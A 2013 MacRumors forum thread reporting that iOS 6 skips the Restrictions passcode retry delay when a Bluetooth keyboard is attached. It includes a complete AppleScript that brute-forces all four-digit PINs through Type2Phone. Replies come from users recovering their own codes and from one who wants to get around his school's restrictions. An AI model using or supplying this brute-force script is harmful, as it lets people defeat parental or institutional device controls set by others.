General Restrictions Passcode Vulnerability iOS6

Discussion in 'Jailbreaks and iOS Hacks' started by russellelly, Apr 4, 2013.

  1. russellelly, Apr 4, 2013
    Last edited: Apr 4, 2013

    russellelly macrumors regular

    Joined:
    Jun 23, 2006
    Location:
    Glasgow, UK
    #1
    Hi,

    I've found a vulnerability in iOS 6.1.2 on an iPhone 4S (probably there in other versions and for other iPhones/iPads/iPod Touches) that will allow you to brute force the restrictions passcode. Explanation is on a video at http://www.youtube.com/watch?v=dgvIdIScG0c , belowis some really simple AppleScript that I have written to exploit the vulnerability.

    The gist of the solution is that iOS usually enforces a delay before re-entering a restrictions passcode after a number of failed attempts, but this is not enforced when using a bluetooth keyboard.

    Enjoy!

    Code:
    -- Author Chris Russell
    -- This script is designed to brute force the restrictions passcode on iPhone
    -- Assumptions:
    --   Blutooth is enabled
    --   Type2Phone App is running and connected to your phone (avail on Mac App Store)
    -- iPhone is switched on and on the restrictions passcode screen (General - Restrictions)
    global pinCodeDigit1
    global pinCodeDigit2
    global pinCodeDigit3
    global pinCodeDigit4
    
    set pinCodeDigit1 to 0
    set pinCodeDigit2 to 0
    set pinCodeDigit3 to 0
    set pinCodeDigit4 to 0
    
    on keyStrokeNumber(num)
    	if (num = 0) then
    		tell application "System Events" to keystroke "0"
    	else if (num = 1) then
    		tell application "System Events" to keystroke "1"
    	else if (num = 2) then
    		tell application "System Events" to keystroke "2"
    	else if (num = 3) then
    		tell application "System Events" to keystroke "3"
    	else if (num = 4) then
    		tell application "System Events" to keystroke "4"
    	else if (num = 5) then
    		tell application "System Events" to keystroke "5"
    	else if (num = 6) then
    		tell application "System Events" to keystroke "6"
    	else if (num = 7) then
    		tell application "System Events" to keystroke "7"
    	else if (num = 8) then
    		tell application "System Events" to keystroke "8"
    	else if (num = 9) then
    		tell application "System Events" to keystroke "9"
    	end if
    end keyStrokeNumber
    
    to incrementPIN()
    	if (pinCodeDigit4 = 9) then
    		if (pinCodeDigit3 = 9) then
    			if (pinCodeDigit2 = 9) then
    				set pinCodeDigit1 to pinCodeDigit1 + 1
    				set pinCodeDigit2 to 0
    				set pinCodeDigit3 to 0
    				set pinCodeDigit4 to 0
    			else
    				set pinCodeDigit2 to pinCodeDigit2 + 1
    				set pinCodeDigit3 to 0
    				set pinCodeDigit4 to 0
    			end if
    		else
    			set pinCodeDigit3 to pinCodeDigit3 + 1
    			set pinCodeDigit4 to 0
    		end if
    	else
    		set pinCodeDigit4 to pinCodeDigit4 + 1
    	end if
    end incrementPIN
    
    to tryPin()
    	keyStrokeNumber(pinCodeDigit1)
    	keyStrokeNumber(pinCodeDigit2)
    	keyStrokeNumber(pinCodeDigit3)
    	keyStrokeNumber(pinCodeDigit4)
    	delay 1
    end tryPin
    
    try
    	«event ascrgdut»
    end try
    
    -- main application, simple ;)
    tell application "Type2Phone" to activate
    repeat 10000 times
    	tryPin()
    	incrementPIN()
    end repeat
    
    
     
  2. SteveLeo macrumors newbie

    Joined:
    Apr 18, 2013
    #2
    I'm hoping this works, trying to get around my schools restrictions. I tried using a plist editor but since my iPad is encrypted I can only find the code if I payed $25.

    Edit: I just watched your video and it seems very legit, but after a certain amount of failed attempts doesn't it lock out out and the time grows after each wrong code?
     
  3. russellelly thread starter macrumors regular

    Joined:
    Jun 23, 2006
    Location:
    Glasgow, UK
    #3
    Sorry for slow reply, didn't get a notification on your post :confused:

    I've seen reports of a maximum 10 attempt restriction, but as you saw in the video it doesn't seem to exist. It _may_ be connected to the option 'Erase Data' under the 'Passcode Lock' settings, but I think this only applies to failed passcode lock attempts. Someone on the YouTube comments reports the script getting a 9999 code (the final one the script would try!), so it looks safe. As ever, backup first just in case :)
     
  4. vlj9r macrumors member

    Joined:
    Feb 18, 2007
    #4
    Russellelly, thank you so much for this script. It worked like a charm with Type2Phone to get me back in my iphone.

    Folks be sure to be insight of your iphone so you can have an idea of what the correct password was since the script will continue to run. I missed it the first time so I ran the script again but changed it to start with 2000. In no time it guessed it right.

    this saved me so much time since now I don't have to reinstall apps or configure all my settings.

    Jerry
     
  5. sheldonfaria macrumors newbie

    Joined:
    Jun 17, 2013
    #5
    Russellelly you genius, It worked. Keep doing the good job man...:cool:
     
  6. Ethan ROCKS22 macrumors newbie

    Joined:
    Aug 4, 2013
  7. Sideswiped8 macrumors newbie

    Joined:
    Aug 28, 2013
    #7
    Other apps

    Will this work with another keyboard app? I am asking because type2phone is a paid app and I am broke.
     
  8. Yelofever macrumors newbie

    Joined:
    Aug 31, 2013
    #8
    This is great it worked for me. But I wasn't around when it done it so I never got the code. Is there away to make it stop or highlight the correct combination?

    Am no good with script but I do very much appreciate you doing this as I couldn't find the pin with plist editor and I don't want to loose my contacts and notes restoring to new.

    Any suggestions on how to narrow it down would be appreciated too
     
  9. darricksailo macrumors 601

    darricksailo

    Joined:
    Dec 18, 2012
    #9
    Record it while its running and then play the video at like 4x or even 8x until you find where it got the correct passcode
     
  10. tendo912 macrumors newbie

    Joined:
    Oct 6, 2013
    #10
    apple script

    how do you make the apple script work for type2iphone? PLEASE HELP!!!!
     

Share This Page